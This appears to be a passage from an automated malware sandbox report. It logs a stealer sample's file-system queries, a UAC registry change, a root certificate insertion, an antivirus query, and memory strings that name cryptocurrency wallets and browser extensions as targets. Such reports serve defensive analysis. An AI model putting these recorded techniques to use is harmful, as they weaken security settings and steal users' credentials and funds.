            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data\tzdata VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data\tzdata\Africa VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data\tzdata\Africa VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data\tzdata VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data\tzdata VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data\tzdata VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data\tzdata\Africa VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data\tzdata VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data\tzdata VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data\tzdata VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data\tzdata VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data\tzdata\America VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data\tzdata VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data\tzdata VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data\tzdata\America VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data\tzdata VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data\tzdata\America VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data\tzdata\America\Argentina VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data\tzdata VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data\tzdata\America VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data\tzdata\America\Argentina VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data\tzdata VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data\tzdata\America VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data\tzdata\America\Argentina VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data\tzdata VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data\tzdata\America VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data\tzdata\America\Argentina VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data\tzdata VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data\tzdata\America VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data\tzdata\America\Argentina VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data\tzdata VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data\tzdata\America VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data\tzdata VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data\tzdata\America VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data\tzdata\America VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data\tzdata\America VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data\tzdata\America VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data\tzdata\America VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data\tzdata VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data\tzdata VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data\tzdata\America VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data\tzdata VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data\tzdata\America VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data\tzdata\America VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data\tzdata VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data\tzdata\America VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data\tzdata VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data\tzdata\America VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\RXdQ_uc4E2f9zze8GHsJCP4V.exeQueries volume information: C:\Users\user\Documents\iofolko5\RXdQ_uc4E2f9zze8GHsJCP4V.exe VolumeInformation
            Source: C:\Users\user\Documents\iofolko5\RXdQ_uc4E2f9zze8GHsJCP4V.exeQueries volume information: C:\Windows VolumeInformation
            Source: C:\Users\user\Documents\iofolko5\RXdQ_uc4E2f9zze8GHsJCP4V.exeQueries volume information: C:\Windows\AppReadiness VolumeInformation
            Source: C:\Users\user\Documents\iofolko5\RXdQ_uc4E2f9zze8GHsJCP4V.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
            Source: C:\Users\user\Documents\iofolko5\RXdQ_uc4E2f9zze8GHsJCP4V.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\base_library.zip VolumeInformation
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\base_library.zip VolumeInformation
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\base_library.zip VolumeInformation
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\base_library.zip VolumeInformation
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\base_library.zip VolumeInformation
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\base_library.zip VolumeInformation
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\base_library.zip VolumeInformation
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\base_library.zip VolumeInformation
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\base_library.zip VolumeInformation
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\base_library.zip VolumeInformation
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\base_library.zip VolumeInformation
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe VolumeInformation
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402 VolumeInformation
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402 VolumeInformation
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe VolumeInformation
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\base_library.zip VolumeInformation
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\base_library.zip VolumeInformation
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402 VolumeInformation
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402 VolumeInformation
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_ctypes.pyd VolumeInformation
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402 VolumeInformation
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe VolumeInformation
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe VolumeInformation
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe VolumeInformation
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\base_library.zip VolumeInformation
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\base_library.zip VolumeInformation
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\base_library.zip VolumeInformation
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\base_library.zip VolumeInformation
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\base_library.zip VolumeInformation
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\base_library.zip VolumeInformation
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\base_library.zip VolumeInformation
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 13_2_00007FF6AAE2D010 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,13_2_00007FF6AAE2D010
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 13_2_00007FF6AAE45C00 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,13_2_00007FF6AAE45C00
            Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Lowering of HIPS / PFW / Operating System Security Settings

            barindex
            Source: C:\Users\user\Desktop\file.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUAJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 BlobJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : Select * From AntiVirusProduct

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 26.2.service123.exe.6c830000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000F.00000003.2589222539.000000000408A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: j1XaE_3LRXkWT1prPdjt1dhT.exe PID: 1736, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: j1XaE_3LRXkWT1prPdjt1dhT.exe PID: 1736, type: MEMORYSTR
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
            Source: wab.exe, 00000004.00000003.1586959605.00000000063CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: sBattle.netBlizzardODIS.jappsrvStreamingVideoProvider\FACEIT\obs-studio\doge%.2f MB (%.2f GB)tonphrase.minecraftBlenderGIMPWindows XP Home Edition %wSMPC-BEGRETECHDriverPack Notifier\exodus.walletjaxScratchgaedmjdfmmahhbjefcbgaolhhanlaolbDashwindowParams.jsonPreferencesAssistanceIdentitiesDiagnosticsOfficeexchangeexodusElectrumsecretefbglgofoippbgcjepnhiblaibcnclgkmeta2NVIDIA CorporationNZXT CAM\tof_launcher\okxdaovisamasterFailed to get temp pathFailed to allocate memory for ZIP data
